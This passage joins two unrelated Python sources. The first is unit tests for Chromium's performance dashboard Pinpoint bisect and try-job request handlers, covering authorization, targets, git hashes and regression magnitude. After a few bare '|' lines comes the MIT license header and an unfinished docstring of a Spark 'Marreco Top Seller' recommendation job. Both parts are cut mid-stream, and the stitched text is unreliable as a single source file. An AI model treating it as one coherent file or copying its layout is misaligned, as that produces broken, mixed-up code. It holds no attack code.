if 'start_commit' not in params:
params['start_commit'] = _DEFAULT_START_COMMIT
if 'end_commit' not in params:
params['end_commit'] = _DEFAULT_END_COMMENT
if 'bisect_mode' not in params:
params['bisect_mode'] = _DEFAULT_BISECT_MODE
if 'pin' not in params:
params['pin'] = _DEFAULT_PIN
if 'bug_id' not in params:
params['bug_id'] = _DEFAULT_BUG_ID
return params
class PinpointNewPrefillRequestHandlerTest(testing_common.TestCase):
def setUp(self):
super(PinpointNewPrefillRequestHandlerTest, self).setUp()
app = webapp2.WSGIApplication([
(r'/pinpoint/new/prefill',
pinpoint_request.PinpointNewPrefillRequestHandler)
])
self.testapp = webtest.TestApp(app)
def testPost_UsesUnescapedStoryName(self):
t = graph_data.TestMetadata(id='M/B/S/foo', unescaped_story_name='foo:bar')
t.put()
response = self.testapp.post('/pinpoint/new/prefill',
{'test_path': 'M/B/S/foo'})
self.assertEqual({'story_filter': 'foo:bar'}, json.loads(response.body))
class PinpointNewPerfTryRequestHandlerTest(testing_common.TestCase):
def setUp(self):
super(PinpointNewPerfTryRequestHandlerTest, self).setUp()
app = webapp2.WSGIApplication([
(r'/pinpoint/new', pinpoint_request.PinpointNewPerfTryRequestHandler)
])
self.testapp = webtest.TestApp(app)
self.SetCurrentUser('foo@chromium.org')
namespaced_stored_object.Set('repositories', {
'chromium': {
'some': 'params'
},
'v8': {
'more': 'params'
}
})
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=False))
def testPost_NotSheriff(self):
response = self.testapp.post('/pinpoint/new')
self.assertEqual({u'error': u'User "foo@chromium.org" not authorized.'},
json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPost_NoStoryFilter(self):
params = GenerateTryRequestParams(
{'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo'})
response = self.testapp.post('/pinpoint/new', params=params)
self.assertEqual({u'error': u'Story is required.'},
json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_service, 'NewJob')
@mock.patch.object(pinpoint_request, 'PinpointParamsFromPerfTryParams',
mock.MagicMock(return_value={'test': 'result'}))
def testPost_Succeeds(self, mock_pinpoint):
mock_pinpoint.return_value = {'foo': 'bar'}
self.SetCurrentUser('foo@chromium.org')
params = {'a': 'b', 'c': 'd'}
response = self.testapp.post('/pinpoint/new', params)
expected_args = mock.call({'test': 'result'})
self.assertEqual([expected_args], mock_pinpoint.call_args_list)
self.assertEqual({'foo': 'bar'}, json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_StoryFilterSet(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'story_filter': 'story',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('story', results['story'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_ComparisonMode_Try(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('try', results['comparison_mode'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=False))
def testPinpointParams_InvalidSheriff_RaisesError(self):
params = {
'test_path': 'ChromiumPerf/foo/blah/foo',
'story_filter': 'required',
}
with self.assertRaises(pinpoint_request.InvalidParamsError):
pinpoint_request.PinpointParamsFromPerfTryParams(params)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_VRTests(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/mac/xr.static.foo/foo',
'extra_test_args': json.dumps(['--extra-trace-args', 'abc,123,foo']),
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('vr_perf_tests', results['target'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_Telemetry(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/mac/system_health/foo',
'extra_test_args': json.dumps(['--extra-trace-args', 'abc,123,foo']),
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('mac', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('performance_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['base_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual(['--extra-trace-args', 'abc,123,foo'],
json.loads(results['extra_test_args']))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_WebviewTelemetry(self):
params = GenerateTryRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'story_filter':
'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('Android Nexus5X WebView Perf', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('performance_webview_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['base_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_LacrosEve(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/lacros-eve-perf/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('lacros-eve-perf', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('performance_test_suite_eve', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['base_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_FuchsiaPerf_WebEngine(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/fuchsia-perf-fyi/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('fuchsia-perf-fyi', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('performance_web_engine_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['base_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
def testPinpointParams_ConvertsCommitsToGitHashes(self):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'start_commit': '1234',
'end_commit': '5678',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('abcd', results['base_git_hash'])
self.assertEqual('abcd', results['end_git_hash'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
def testPinpointParams_SkipsConvertingHashes(self, mock_crrev):
params = GenerateTryRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('abcd1234', results['base_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertFalse(mock_crrev.called)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
def testPinpointParams_V8(self, mock_crrev):
mock_crrev.return_value = {'git_sha': 'acbd'}
params = GenerateTryRequestParams({
'test_path': 'internal.client.v8/Pixel2/v8/JSTests/Array/Total',
'start_commit': '1234',
'end_commit': '5678',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromPerfTryParams(params)
self.assertEqual('', results['target'])
mock_crrev.assert_any_call(
number='1234',
numbering_identifier='refs/heads/main',
numbering_type='COMMIT_POSITION',
project='chromium',
repo='v8/v8')
@mock.patch.object(pinpoint_request, 'FindMagnitudeBetweenCommits',
mock.MagicMock(return_value=None))
class PinpointNewBisectRequestHandlerTest(testing_common.TestCase):
def setUp(self):
super(PinpointNewBisectRequestHandlerTest, self).setUp()
app = webapp2.WSGIApplication([
(r'/pinpoint/new', pinpoint_request.PinpointNewBisectRequestHandler)
])
self.testapp = webtest.TestApp(app)
self.SetCurrentUser('foo@chromium.org')
namespaced_stored_object.Set('repositories', {
'chromium': {
'some': 'params'
},
'v8': {
'more': 'params'
}
})
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=False))
def testPost_NotSheriff(self):
response = self.testapp.post('/pinpoint/new')
self.assertEqual({u'error': u'User "foo@chromium.org" not authorized.'},
json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_service, 'NewJob')
@mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
mock.MagicMock(return_value={'test': 'result'}))
def testPost_NewJob_Fails(self, mock_pinpoint):
mock_pinpoint.return_value = {'error': 'something'}
self.SetCurrentUser('foo@chromium.org')
params = {'a': 'b', 'c': 'd'}
response = self.testapp.post('/pinpoint/new', params)
expected_args = mock.call({'test': 'result'})
self.assertEqual([expected_args], mock_pinpoint.call_args_list)
self.assertEqual({'error': 'something'}, json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_service, 'NewJob')
@mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
mock.MagicMock(return_value={'test': 'result'}))
def testPost_Succeeds(self, mock_pinpoint):
mock_pinpoint.return_value = {'foo': 'bar'}
self.SetCurrentUser('foo@chromium.org')
params = {'a': 'b', 'c': 'd'}
response = self.testapp.post('/pinpoint/new', params)
expected_args = mock.call({'test': 'result'})
self.assertEqual([expected_args], mock_pinpoint.call_args_list)
self.assertEqual({'foo': 'bar'}, json.loads(response.body))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=False))
def testPinpointParams_InvalidSheriff_RaisesError(self):
params = {'test_path': 'ChromiumPerf/foo/blah/foo'}
with self.assertRaises(pinpoint_request.InvalidParamsError):
pinpoint_request.PinpointParamsFromBisectParams(params)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_service, 'NewJob')
@mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
mock.MagicMock(return_value={'test': 'result'}))
def testPost_Succeeds_AddsToAlert(self, mock_pinpoint):
mock_pinpoint.return_value = {'jobId': 'bar'}
self.SetCurrentUser('foo@chromium.org')
test_key = utils.TestKey('M/B/S/foo')
anomaly_entity = anomaly.Anomaly(
start_revision=1, end_revision=2, test=test_key)
anomaly_entity.put()
params = {
'a': 'b',
'c': 'd',
'alerts': json.dumps([anomaly_entity.key.urlsafe()])
}
response = self.testapp.post('/pinpoint/new', params)
expected_args = mock.call({'test': 'result'})
self.assertEqual([expected_args], mock_pinpoint.call_args_list)
self.assertEqual({'jobId': 'bar'}, json.loads(response.body))
self.assertEqual(['bar'], anomaly_entity.pinpoint_bisects)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_service, 'NewJob')
@mock.patch.object(pinpoint_request, 'PinpointParamsFromBisectParams',
mock.MagicMock(return_value={'test': 'result'}))
def testPost_Fails_AddsToAlert(self, mock_pinpoint):
mock_pinpoint.return_value = {'error': 'bar'}
self.SetCurrentUser('foo@chromium.org')
test_key = utils.TestKey('M/B/S/foo')
anomaly_entity = anomaly.Anomaly(
start_revision=1, end_revision=2, test=test_key)
anomaly_entity.put()
params = {
'a': 'b',
'c': 'd',
'alerts': json.dumps([anomaly_entity.key.urlsafe()])
}
response = self.testapp.post('/pinpoint/new', params)
expected_args = mock.call({'test': 'result'})
self.assertEqual([expected_args], mock_pinpoint.call_args_list)
self.assertEqual({'error': 'bar'}, json.loads(response.body))
self.assertEqual([], anomaly_entity.pinpoint_bisects)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_ComparisonMagnitude_Added(self):
test_key = utils.TestKey('ChromiumPerf/mac/cc_perftests/foo')
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'cc_perftests': {
'foo': {}
}})
anomaly_entity = anomaly.Anomaly(
start_revision=1,
end_revision=2,
test=test_key,
median_before_anomaly=1,
median_after_anomaly=10)
anomaly_entity.put()
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/cc_perftests/foo',
'story_filter': 'required',
'alerts': json.dumps([anomaly_entity.key.urlsafe()])
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual(9, results['comparison_magnitude'])
self.assertEqual(anomaly_entity.key.urlsafe(),
json.loads(results['tags'])['alert'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_NonTelemetry(self):
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'cc_perftests': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/cc_perftests/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('mac', results['configuration'])
self.assertEqual('cc_perftests', results['benchmark'])
self.assertEqual('foo', results['chart'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual('performance', results['comparison_mode'])
self.assertEqual(1, results['bug_id'])
self.assertEqual(params['test_path'],
json.loads(results['tags'])['test_path'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_Telemetry(self):
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/system_health/foo',
'story_filter': 'foo',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('mac', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('foo', results['chart'])
self.assertEqual('performance_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual('performance', results['comparison_mode'])
self.assertEqual(1, results['bug_id'])
self.assertEqual('foo', results['story'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_WebviewTelemetry(self):
testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'story_filter':
'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('Android Nexus5X WebView Perf', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('foo', results['chart'])
self.assertEqual('performance_webview_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual('performance', results['comparison_mode'])
self.assertEqual(1, results['bug_id'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_LacrosEve(self):
testing_common.AddTests(['ChromiumPerf'], ['lacros-eve-perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/lacros-eve-perf/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('lacros-eve-perf', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('foo', results['chart'])
self.assertEqual('performance_test_suite_eve', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual('performance', results['comparison_mode'])
self.assertEqual(1, results['bug_id'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_IsolateTarget_FuchsiaPerf_WebEngine(self):
testing_common.AddTests(['ChromiumPerf'], ['fuchsia-perf-fyi'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/fuchsia-perf-fyi/system_health/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('fuchsia-perf-fyi', results['configuration'])
self.assertEqual('system_health', results['benchmark'])
self.assertEqual('foo', results['chart'])
self.assertEqual('performance_web_engine_test_suite', results['target'])
self.assertEqual('foo@chromium.org', results['user'])
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertEqual('performance', results['comparison_mode'])
self.assertEqual(1, results['bug_id'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_Metric_TopLevelOnly(self):
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'blink_perf': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/blink_perf/foo',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('foo', results['chart'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_Metric_ChartAndTrace(self):
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'blink_perf': {
'foo': {
'http___bar.html': {}
}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/blink_perf/foo/http___bar.html',
'story_filter': 'required',
})
t = graph_data.TestMetadata(
id=params['test_path'], unescaped_story_name='http://bar.html')
t.UpdateSheriff()
t.put()
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('foo', results['chart'])
self.assertEqual('http://bar.html', results['trace'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_Metric_GroupingLabelChartAndTrace(self):
testing_common.AddTests(
['ChromiumPerf'], ['mac'],
{'blink_perf': {
'foo': {
'label': {
'bar.html': {}
}
}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
'story_filter': 'required',
})
t = graph_data.TestMetadata(id=params['test_path'],)
t.UpdateSheriff()
t.put()
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('label', results['grouping_label'])
self.assertEqual('foo', results['chart'])
self.assertEqual('bar.html', results['trace'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_BisectMode_Invalid_RaisesError(self):
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
'bisect_mode': 'foo',
'story_filter': 'required',
})
t = graph_data.TestMetadata(id=params['test_path'],)
t.UpdateSheriff()
t.put()
with self.assertRaises(pinpoint_request.InvalidParamsError):
pinpoint_request.PinpointParamsFromBisectParams(params)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_BisectMode_Functional(self):
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/blink_perf/foo/label/bar.html',
'bisect_mode': 'functional',
'story_filter': 'required',
})
t = graph_data.TestMetadata(id=params['test_path'],)
t.UpdateSheriff()
t.put()
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('functional', results['comparison_mode'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
def testPinpointParams_ConvertsCommitsToGitHashes(self):
testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'start_commit': '1234',
'end_commit': '5678',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('abcd', results['start_git_hash'])
self.assertEqual('abcd', results['end_git_hash'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
def testPinpointParams_SkipsConvertingHashes(self, mock_crrev):
testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'bug_id': '',
'story_filter': 'required',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('abcd1234', results['start_git_hash'])
self.assertEqual('efgh5678', results['end_git_hash'])
self.assertFalse(mock_crrev.called)
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_SplitsStatistics(self):
statistic_types = ['avg', 'min', 'max', 'sum', 'std', 'count']
for s in statistic_types:
testing_common.AddTests(['ChromiumPerf'], ['mac'],
{'system_health': {
'foo_%s' % s: {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/mac/system_health/foo_%s' % s,
'story_filter': 'required',
'bug_id': -1,
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual(s, results['statistic'])
self.assertEqual('foo', results['chart'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_WithPin(self):
testing_common.AddTests(['ChromiumPerf'], ['android-webview-nexus5x'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path': 'ChromiumPerf/android-webview-nexus5x/system_health/foo',
'story_filter': 'required',
'pin': 'https://path/to/patch',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual('https://path/to/patch', results['pin'])
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering')
def testPinpointParams_V8(self, mock_crrev):
mock_crrev.return_value = {'git_sha': 'acbd'}
testing_common.AddTests(['internal.client.v8'], ['Pixel2'],
{'v8': {
'JSTests': {
'Array': {
'Total': {}
}
}
}})
params = GenerateBisectRequestParams({
'test_path': 'internal.client.v8/Pixel2/v8/JSTests/Array/Total',
'start_commit': '1234',
'end_commit': '5678',
'story_filter': 'required',
'pin': 'https://path/to/patch',
})
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertNotIn('grouping_label', results)
self.assertNotIn('trace', results)
self.assertEqual('', results['chart'])
self.assertEqual('', results['target'])
mock_crrev.assert_any_call(
number='1234',
numbering_identifier='refs/heads/main',
numbering_type='COMMIT_POSITION',
project='chromium',
repo='v8/v8')
class PinpointNewBisectComparisonMagnitude(testing_common.TestCase):
def setUp(self):
super(PinpointNewBisectComparisonMagnitude, self).setUp()
self.SetCurrentUser('foo@chromium.org')
namespaced_stored_object.Set('repositories', {
'chromium': {
'some': 'params'
},
'v8': {
'more': 'params'
}
})
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_NoAlert(self):
testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'start_commit':
'1051',
'end_commit':
'1151',
'story_filter':
'required',
})
t = graph_data.TestMetadata(id=params['test_path'])
t.put()
rows = dict(
itertools.chain(
list(
zip(
itertools.islice(itertools.count(1000, 2), 50),
itertools.repeat({'value': 0.1}))),
list(
zip(
itertools.islice(itertools.count(1101, 2), 50),
itertools.repeat({'value': 0.5})))))
testing_common.AddRows(params['test_path'], rows)
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual(0.4, results['comparison_magnitude'])
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
@mock.patch.object(pinpoint_request.crrev_service, 'GetCommit')
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_GitHashes(self, mock_commit):
def _MockCommit(git_sha):
if git_sha == 'abc':
return {'number': 1050}
return {'number': 1150}
mock_commit.side_effect = _MockCommit
testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'start_commit':
'abc',
'end_commit':
'def',
'story_filter':
'required',
})
t = graph_data.TestMetadata(id=params['test_path'])
t.put()
rows = dict(
itertools.chain(
list(
zip(
itertools.islice(itertools.count(1000, 2), 50),
itertools.repeat({'value': 0.1}))),
list(
zip(
itertools.islice(itertools.count(1101, 2), 50),
itertools.repeat({'value': 0.5})))))
testing_common.AddRows(params['test_path'], rows)
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertEqual(0.4, results['comparison_magnitude'])
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_NoData(self):
testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'start_commit':
'1050',
'end_commit':
'1150',
'story_filter':
'required',
})
t = graph_data.TestMetadata(id=params['test_path'])
t.put()
results = pinpoint_request.PinpointParamsFromBisectParams(params)
self.assertFalse('comparison_magnitude' in results)
@mock.patch.object(pinpoint_request.crrev_service, 'GetNumbering',
mock.MagicMock(return_value={'git_sha': 'abcd'}))
@mock.patch.object(utils, 'IsValidSheriffUser',
mock.MagicMock(return_value=True))
def testPinpointParams_OverriddenAnomalyConfig(self):
testing_common.AddTests(['ChromiumPerf'], ['Android Nexus5X WebView Perf'],
{'system_health': {
'foo': {}
}})
params = GenerateBisectRequestParams({
'test_path':
'ChromiumPerf/Android Nexus5X WebView Perf/system_health/foo',
'start_commit':
'1051',
'end_commit':
'1151',
'story_filter':
'required',
})
a = anomaly_config.AnomalyConfig()
a.config = {'min_segment_size': 1}
a.patterns = ['*/*/*/*']
a.put()
t = graph_data.TestMetadata(id=params['test_path'])
t.overridden_anomaly_config = a.key
t.put()
rows = dict(
itertools.chain(
list(
zip(
itertools.islice(itertools.count(1000, 2), 75),
itertools.repeat({'value': -100.0}))), [(1050, {
'value': 0.1
})],
list(
zip(
itertools.islice(itertools.count(1101, 2), 50),
itertools.repeat({'value': 0.5})))))
testing_common.AddRows(params['test_path'], rows)
results = pinpoint_request.PinpointParamsFromBisectParams(params)
# We overrode the anomaly config with a window of 1, and there's only a
# single row with value 0.1, the rest are 0.0.
self.assertEqual(0.4, results['comparison_magnitude'])
|
|
#MIT License
#
#Copyright (c) 2017 Willian Fuks
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""
Set of tools to run Marreco's Top Seller algorithm in spark.
"""
import os
import sys
import json
import operator
import math
import random
import argparse
from collections import defaultdict
sys.path.append('..')
from base import MarrecoBase
from py4j.protocol import Py4JJavaError
from pyspark.sql.utils import AnalysisException
from pyspark.sql import SparkSession
from pyspark.sql import types as stypes
class MarrecoTopSellerJob(MarrecoBase):
"""This Class has all methods necessary to build Marreco Neighborhood
against Spark.
:type context: `pyspark.SparkContext`
:param context: context in which Jobs are ran against.
"""
def transform_data(self, sc, args):
"""This method gets datajet files as input and prepare them on a daily
intermediary basis for Marreco's Top Seller algorithm.
:type sc: spark context
:param sc: spark context for running jobs.
:param kwargs:
:type days_init: int
:param days: how many days to scan through the files to be used
in the transformation phase.
:type days_end: int
:param days_end:
:type inter_uri: str
